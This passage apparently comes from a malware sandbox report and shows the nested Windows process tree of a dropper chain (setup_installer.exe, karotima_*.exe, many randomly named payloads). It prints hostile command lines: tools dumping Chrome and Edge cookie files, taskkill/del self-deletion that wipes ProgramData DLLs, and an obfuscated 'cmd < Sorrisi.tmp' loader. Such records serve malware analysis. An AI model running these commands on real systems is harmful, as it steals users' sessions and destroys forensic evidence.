                                                                                                                                              • C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe
                                                                                                                                                "C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe"
                                                                                                                                                11⤵
                                                                                                                                                  PID:4976
                                                                                                                                                  • C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe
                                                                                                                                                    "C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe" -a
                                                                                                                                                    12⤵
                                                                                                                                                      PID:5572
                                                                                                                                                  • C:\Users\Admin\Documents\JQ_XGvgpuevm53n2BK5KnMha.exe
                                                                                                                                                    "C:\Users\Admin\Documents\JQ_XGvgpuevm53n2BK5KnMha.exe"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5444
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7823546.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7823546.exe"
                                                                                                                                                        12⤵
                                                                                                                                                          PID:6456
                                                                                                                                                      • C:\Users\Admin\Documents\e_vHsxZZxEUwNFpdvuZxcCyJ.exe
                                                                                                                                                        "C:\Users\Admin\Documents\e_vHsxZZxEUwNFpdvuZxcCyJ.exe"
                                                                                                                                                        11⤵
                                                                                                                                                          PID:6416
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                            12⤵
                                                                                                                                                              PID:6668
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\setup_install.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\setup_install.exe"
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:7052
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:6176
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_2.exe
                                                                                                                                                                        karotima_2.exe
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:6312
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_2.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_2.exe" -a
                                                                                                                                                                            16⤵
                                                                                                                                                                              PID:6616
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                          14⤵
                                                                                                                                                                            PID:6164
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_1.exe
                                                                                                                                                                              karotima_1.exe
                                                                                                                                                                              15⤵
                                                                                                                                                                                PID:2400
                                                                                                                                                                                • C:\Users\Admin\Documents\9wN6u1UmsvgI02kNQacTmJ3A.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\9wN6u1UmsvgI02kNQacTmJ3A.exe"
                                                                                                                                                                                  16⤵
                                                                                                                                                                                    PID:6496
                                                                                                                                                                                  • C:\Users\Admin\Documents\Vqr7h6Xa7wPt6aoSDo_IIabl.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\Vqr7h6Xa7wPt6aoSDo_IIabl.exe"
                                                                                                                                                                                    16⤵
                                                                                                                                                                                      PID:5032
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                        17⤵
                                                                                                                                                                                          PID:5800
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                            "{path}"
                                                                                                                                                                                            18⤵
                                                                                                                                                                                              PID:3596
                                                                                                                                                                                        • C:\Users\Admin\Documents\hF6pyBfC12ZGzTEGS16yX72S.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\hF6pyBfC12ZGzTEGS16yX72S.exe"
                                                                                                                                                                                          16⤵
                                                                                                                                                                                            PID:3556
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              17⤵
                                                                                                                                                                                                PID:5884
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                17⤵
                                                                                                                                                                                                  PID:7956
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                    PID:7392
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                      PID:8084
                                                                                                                                                                                                  • C:\Users\Admin\Documents\Bl91Pqh5P5InOWdNezzApCG2.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\Bl91Pqh5P5InOWdNezzApCG2.exe"
                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                      PID:6556
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5683499.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5683499.exe"
                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                          PID:6164
                                                                                                                                                                                                      • C:\Users\Admin\Documents\ngSIlRLwY6Rd3ceTsN1bzm31.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\ngSIlRLwY6Rd3ceTsN1bzm31.exe"
                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                          PID:496
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im ngSIlRLwY6Rd3ceTsN1bzm31.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ngSIlRLwY6Rd3ceTsN1bzm31.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                              PID:7636
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                taskkill /im ngSIlRLwY6Rd3ceTsN1bzm31.exe /f
                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:7900
                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:7900
                                                                                                                                                                                                          • C:\Users\Admin\Documents\09IfAsOfHYIMi67drBgecp75.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\09IfAsOfHYIMi67drBgecp75.exe"
                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                              PID:4872
                                                                                                                                                                                                            • C:\Users\Admin\Documents\9esa4ZVkWERcpk_pYxvmedMn.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\9esa4ZVkWERcpk_pYxvmedMn.exe"
                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                PID:4780
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\setup_install.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS4D330317\setup_install.exe"
                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                        PID:6052
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                          19⤵
                                                                                                                                                                                                                            PID:5216
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_2.exe
                                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                PID:7196
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_2.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_2.exe" -a
                                                                                                                                                                                                                                  21⤵
                                                                                                                                                                                                                                    PID:7804
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_1.exe
                                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                      PID:2400
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe"
                                                                                                                                                                                                                                        21⤵
                                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                            C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                              C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                PID:7452
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe"
                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                                  22⤵
      PID:1452
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im KHHiKkhozceUZWUNRNFYQnBP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe" & del C:\ProgramData\*.dll & exit
          23⤵
          PID:8100
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im KHHiKkhozceUZWUNRNFYQnBP.exe /f
              24⤵
              • Kills process with taskkill
              PID:6564
    • C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
      C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
      22⤵
      PID:6356
• C:\Users\Admin\Documents\OXvywiP9FsBwPYPmR4qrU2TR.exe
  "C:\Users\Admin\Documents\OXvywiP9FsBwPYPmR4qrU2TR.exe"
  21⤵
  PID:7176
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
      22⤵
      PID:6832
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          23⤵
          PID:7952
            • C:\Windows\SysWOW64\findstr.exe
              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
              24⤵
              PID:7688
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\Acre.exe.com
              Acre.exe.com k
              24⤵
              PID:7196
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1 -n 30
              24⤵
              • Runs ping.exe
              PID:7224
• C:\Users\Admin\Documents\YMqflIHmlsZajUC5S884nVYz.exe
  "C:\Users\Admin\Documents\YMqflIHmlsZajUC5S884nVYz.exe"
  21⤵
  PID:7564
    • C:\Users\Admin\AppData\Roaming\1234.exe
      C:\Users\Admin\AppData\Roaming\1234.exe 1234
      22⤵
      PID:6676
        • C:\Users\Admin\AppData\Roaming\1234.exe
          "{path}"
          23⤵
          PID:8284
• C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
  "C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe"
  21⤵
  PID:8008
    • C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
      C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
      22⤵
      PID:6140
    • C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
      C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
      22⤵
      PID:7728
• C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe
  "C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe"
  21⤵
  PID:7308
    • C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe
      C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe
      22⤵
      PID:7436
• C:\Users\Admin\Documents\cPOJLcKGVOGCb4cFQdssisXh.exe
  "C:\Users\Admin\Documents\cPOJLcKGVOGCb4cFQdssisXh.exe"
  21⤵
  PID:7976
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      22⤵
      PID:5044
        • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS4B320207\setup_install.exe"
          23⤵
          PID:7592
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c karotima_2.exe
              24⤵
              PID:7320
                • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_2.exe
                  karotima_2.exe
                  25⤵
                  PID:6332
                    • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_2.exe
                      "C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_2.exe" -a
                      26⤵
                      PID:7488
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c karotima_1.exe
              24⤵
              PID:3168
                • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_1.exe
                  karotima_1.exe
                  25⤵
                  PID:7120
                    • C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe
                      "C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe"
                      26⤵
                      PID:2180
                        • C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe
                          C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe
                          27⤵
                          PID:2208
                    • C:\Users\Admin\Documents\PdBFxMylOJlDXNrcPAijUyx8.exe
                      "C:\Users\Admin\Documents\PdBFxMylOJlDXNrcPAijUyx8.exe"
                      26⤵
                      PID:5376
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          27⤵
                          PID:1640
                            • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS86684A08\setup_install.exe"
                                                                                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                                                                                        PID:8568
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                          29⤵
                                                                                                                                                                                                                                                                                                                            PID:7432
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_2.exe
                                                                                                                                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                PID:3592
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                  31⤵
                                                                                                                                                                                                                                                                                                                                    PID:2580
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                29⤵
                                                                                                                                                                                                                                                                                                                                  PID:8120
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_1.exe
                                                                                                                                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                                                      PID:5800
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Ua6FgA1rw251p8eT4xIj2yCW.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Ua6FgA1rw251p8eT4xIj2yCW.exe"
                                                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                                                          PID:6556
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\0WOmwa3X2KuIkslrZEE3kVBj.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\0WOmwa3X2KuIkslrZEE3kVBj.exe"
                                                                                                                                                                                                                                                                                                                                          31⤵
                                                                                                                                                                                                                                                                                                                                            PID:7608
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\nvnzJvEEMk5z4bVhBEy1qxDs.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\nvnzJvEEMk5z4bVhBEy1qxDs.exe"
                                                                                                                                                                                                                                                                                                                                            31⤵
                                                                                                                                                                                                                                                                                                                                              PID:5684
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe"
                                                                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                                                                PID:9168
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                    PID:9996
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                                                                      PID:10188
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\ABn2oRk0RoAhUpUDFvgBQR1J.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\ABn2oRk0RoAhUpUDFvgBQR1J.exe"
                                                                                                                                                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8072
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\YyB2SFILAL3qOzsyzk7N3EDo.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\YyB2SFILAL3qOzsyzk7N3EDo.exe"
                                                                                                                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6544
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe"
                                                                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6844
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                                                                                                                                                                              PID:10036
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                                                                                                PID:10236
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\tfjcGSgvuqit4yR4akWFuG33.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\tfjcGSgvuqit4yR4akWFuG33.exe"
                                                                                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8800
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe"
                                                                                                                                                                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe
              32⤵
                PID:9988
          • C:\Users\Admin\Documents\_CCT11xhwxsXDfZK_EVVvyAl.exe
            "C:\Users\Admin\Documents\_CCT11xhwxsXDfZK_EVVvyAl.exe"
            31⤵
              PID:4140
          • C:\Users\Admin\Documents\Kt7NZh1VK_RT7jfMQUhYedwG.exe
            "C:\Users\Admin\Documents\Kt7NZh1VK_RT7jfMQUhYedwG.exe"
            31⤵
              PID:9272
          • C:\Users\Admin\Documents\zGjdQ_EBW5K1SjoC5EMfr7Td.exe
            "C:\Users\Admin\Documents\zGjdQ_EBW5K1SjoC5EMfr7Td.exe"
            31⤵
              PID:9292
          • C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe
            "C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe"
            31⤵
              PID:9400
            • C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe
              "C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe"
              32⤵
                PID:9924
          • C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe
            "C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe"
            31⤵
              PID:9392
            • C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe
              C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe
              32⤵
                PID:10116
          • C:\Users\Admin\Documents\JzNfws_D_C_1__PpiDYUPkTm.exe
            "C:\Users\Admin\Documents\JzNfws_D_C_1__PpiDYUPkTm.exe"
            31⤵
              PID:9384
          • C:\Users\Admin\Documents\mEYtuLxX6j2o0bcQBa7j7g6H.exe
            "C:\Users\Admin\Documents\mEYtuLxX6j2o0bcQBa7j7g6H.exe"
            31⤵
              PID:9376
          • C:\Users\Admin\Documents\AsXHAMjLpDUkPf_l1nQqGWXt.exe
            "C:\Users\Admin\Documents\AsXHAMjLpDUkPf_l1nQqGWXt.exe"
            31⤵
              PID:9368
          • C:\Users\Admin\Documents\nbdZJ7axZhhWzEIu2JnD90jo.exe
            "C:\Users\Admin\Documents\nbdZJ7axZhhWzEIu2JnD90jo.exe"
            31⤵
              PID:9460
          • C:\Users\Admin\Documents\hBpdif15uNmli89sAgPE5vId.exe
            "C:\Users\Admin\Documents\hBpdif15uNmli89sAgPE5vId.exe"
            31⤵
              PID:9532
• C:\Users\Admin\Documents\TF5eJbjjQhqZG6EQJsz9bmQw.exe
  "C:\Users\Admin\Documents\TF5eJbjjQhqZG6EQJsz9bmQw.exe"
  26⤵
    PID:5940
  • C:\Users\Admin\AppData\Roaming\1234.exe
    C:\Users\Admin\AppData\Roaming\1234.exe 1234
    27⤵
      PID:7284
• C:\Users\Admin\Documents\JlvspoH51nRoesZrrBMQmRr4.exe
  "C:\Users\Admin\Documents\JlvspoH51nRoesZrrBMQmRr4.exe"
  26⤵
    PID:5068
• C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe
  "C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe"
  26⤵
    PID:4876
  • C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe
    C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe
    27⤵
      PID:6312
• C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe
  "C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe"
  26⤵
    PID:1176
  • C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe
    "C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe"
    27⤵
      PID:8776
• C:\Users\Admin\Documents\gE886zlrNkM5NnPzApwJZuOh.exe
  "C:\Users\Admin\Documents\gE886zlrNkM5NnPzApwJZuOh.exe"
  26⤵
    PID:5336
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im gE886zlrNkM5NnPzApwJZuOh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\gE886zlrNkM5NnPzApwJZuOh.exe" & del C:\ProgramData\*.dll & exit
    27⤵
      PID:8684
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /im gE886zlrNkM5NnPzApwJZuOh.exe /f
      28⤵
      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1184
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\IQYwfOoqp933VT2XihKpOWeS.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\IQYwfOoqp933VT2XihKpOWeS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7200
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\IAOseqBMm3K4OIvQoC3gvztk.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\IAOseqBMm3K4OIvQoC3gvztk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\1oNtB77Q1iBW8TzqdDQ6TmVV.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\1oNtB77Q1iBW8TzqdDQ6TmVV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7576
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\N399991jiGbNZVarOqvkbwLg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\N399991jiGbNZVarOqvkbwLg.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4525732.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4525732.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:6532
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ZqjR0OLayvWy9uBumipdN0CW.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ZqjR0OLayvWy9uBumipdN0CW.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:580
